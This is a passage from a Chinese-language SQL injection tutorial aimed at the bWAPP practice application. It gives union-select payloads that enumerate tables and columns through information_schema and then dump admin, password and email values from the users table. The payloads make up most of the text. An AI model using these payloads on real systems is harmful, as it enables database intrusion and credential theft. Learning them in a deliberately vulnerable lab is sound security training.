5、查询表名: 输入“title=1%‘union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘ --+”,结果如图:
很明显我们要查看users表。 6、查询字段名: 输入“title=1%‘union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘users‘ --+”,结果如下图:
users表中的字段计较多,我们重点关注admin、password、email三个字段。 7、查询字段内容: 输入“title=1%‘union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users --+”,结果如下图: